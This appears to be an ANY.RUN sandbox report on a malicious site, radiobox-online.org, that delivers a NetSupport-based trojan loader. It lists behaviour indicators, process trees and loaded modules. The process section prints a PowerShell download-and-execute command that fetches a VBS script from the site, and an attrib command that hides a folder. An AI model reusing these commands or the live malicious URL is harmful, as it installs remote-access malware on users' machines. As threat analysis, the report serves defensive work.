General Info

URL

https://radiobox-online.org

Full analysis
https://app.any.run/tasks/e24945bb-027e-4aee-a3b1-7ea12444439c
Verdict
Malicious activity
Analysis date
7/11/2019, 16:13:28
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

trojan

loader

unwanted

netsupport

Indicators:

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
60 seconds
Additional time used
none
Fakenet option
off
Heavy Evaision option
on
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (75.0.3770.100)
  • Google Update Helper (1.3.34.7)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.7.2 (4.7.03062)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Mozilla Firefox 67.0.4 (x86 en-US) (67.0.4)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB4019990
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Application was dropped or rewritten from another process
  • KB24115436.exe (PID: 3692)
  • client32.exe (PID: 2268)
  • WinSupport.exe (PID: 4028)
  • temp69.exe (PID: 3896)
Loads dropped or rewritten executable
  • client32.exe (PID: 2268)
Connects to CnC server
  • client32.exe (PID: 2268)
Writes to a start menu file
  • WinSupport.exe (PID: 4028)
Downloads executable files from IP
  • WScript.exe (PID: 3620)
Downloads executable files from the Internet
  • WScript.exe (PID: 3620)
Connects to server without host name
  • client32.exe (PID: 2268)
Creates files in the user directory
  • WinSupport.exe (PID: 4028)
  • client32.exe (PID: 2268)
  • KB24115436.exe (PID: 3692)
  • powershell.exe (PID: 3872)
Reads Internet Cache Settings
  • client32.exe (PID: 2268)
Executable content was dropped or overwritten
  • WinSupport.exe (PID: 4028)
  • WScript.exe (PID: 3620)
  • KB24115436.exe (PID: 3692)
  • temp69.exe (PID: 3896)
Executes scripts
  • WScript.exe (PID: 2432)
  • powershell.exe (PID: 3872)
Executes PowerShell scripts
  • iexplore.exe (PID: 3076)
  • iexplore.exe (PID: 3556)
Application launched itself
  • WScript.exe (PID: 2432)
Uses ATTRIB.EXE to modify file attributes
  • temp69.exe (PID: 3896)
Drop NetSupport executable file
  • WinSupport.exe (PID: 4028)
Creates files in the user directory
  • iexplore.exe (PID: 3556)
Reads settings of System Certificates
  • iexplore.exe (PID: 3076)
  • iexplore.exe (PID: 3556)
Reads internet explorer settings
  • iexplore.exe (PID: 3556)
Changes settings of System certificates
  • iexplore.exe (PID: 3076)
Changes internet zones settings
  • iexplore.exe (PID: 3076)
Reads Internet Cache Settings
  • iexplore.exe (PID: 3556)
Adds / modifies Windows certificates
  • iexplore.exe (PID: 3076)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Screenshots

Processes

Total processes
46
Monitored processes
11
Malicious processes
8
Suspicious processes
0

Behavior graph

+
start download and start drop and start drop and start drop and start iexplore.exe iexplore.exe powershell.exe no specs powershell.exe wscript.exe wscript.exe temp69.exe attrib.exe no specs kb24115436.exe winsupport.exe client32.exe
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
3076
CMD
"C:\Program Files\Internet Explorer\iexplore.exe" https://radiobox-online.org
Path
C:\Program Files\Internet Explorer\iexplore.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\cryptbase.dll
c:\program files\internet explorer\sqmapi.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\version.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wship6.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\ieui.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\url.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\msfeeds.dll
c:\windows\system32\sxs.dll
c:\windows\system32\mlang.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\userenv.dll
c:\windows\system32\schannel.dll
c:\windows\system32\mssprxy.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\credssp.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\windowspowershell\v1.0\powershell.exe

PID
3556
CMD
"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3076 CREDAT:71937
Path
C:\Program Files\Internet Explorer\iexplore.exe
Indicators
Parent process
iexplore.exe
User
admin
Integrity Level
LOW
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\wininet.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\comdlg32.dll
c:\program files\internet explorer\ieshims.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\internet explorer\sqmapi.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rsaenh.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\mlang.dll
c:\windows\system32\uxtheme.dll
c:\program files\java\jre1.8.0_92\bin\ssv.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\version.dll
c:\progra~1\micros~1\office14\urlredir.dll
c:\windows\system32\secur32.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\progra~1\micros~1\office14\msohev.dll
c:\program files\java\jre1.8.0_92\bin\jp2ssv.dll
c:\program files\java\jre1.8.0_92\bin\msvcr100.dll
c:\program files\java\jre1.8.0_92\bin\deploy.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\sxs.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\userenv.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\schannel.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\credssp.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\p2pcollab.dll
c:\windows\system32\qagentrt.dll
c:\windows\system32\fveui.dll
c:\windows\system32\mshtml.dll
c:\windows\system32\msls31.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\jscript.dll
c:\windows\system32\imgutil.dll
c:\windows\system32\pngfilt.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll

PID
3968
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('https://radiobox-online.org/images/image.vbs2','documentation.vbs');Start-Process 'documentation.vbs'
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
No indicators
Parent process
iexplore.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll

PID
3872
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('https://radiobox-online.org/images/image.vbs2','documentation.vbs');Start-Process 'documentation.vbs'
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
iexplore.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\security.dll
c:\windows\system32\credssp.dll
c:\windows\system32\schannel.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\wscript.exe
c:\windows\system32\netutils.dll

PID
2432
CMD
"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\documentation.vbs"
Path
C:\Windows\System32\WScript.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft ® Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sxs.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wshext.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\credssp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\mlang.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\schannel.dll
c:\windows\system32\secur32.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\nlaapi.dll
c:\program files\common files\system\ado\msado15.dll
c:\windows\system32\msdart.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll

PID
3620
CMD
"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\temp.vbs"
Path
C:\Windows\System32\WScript.exe
Indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft ® Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\lpk.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sxs.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wshext.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\program files\common files\system\ado\msado15.dll
c:\windows\system32\msdart.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\users\admin\appdata\local\temp\temp69.exe

PID
3896
CMD
"C:\Users\admin\AppData\Local\Temp\temp69.exe"
Path
C:\Users\admin\AppData\Local\Temp\temp69.exe
Indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Piriform Ltd
Description
CCleaner
Version
4, 11, 00, 4619
Modules
Image
c:\users\admin\appdata\local\temp\temp69.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\credssp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\schannel.dll
c:\windows\system32\secur32.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\cryptbase.dll
c:\temp\kb24115436.exe

PID
2660
CMD
attrib +h +s C:\Temp
Path
C:\Windows\system32\attrib.exe
Indicators
No indicators
Parent process
temp69.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Attribute Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\attrib.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ulib.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
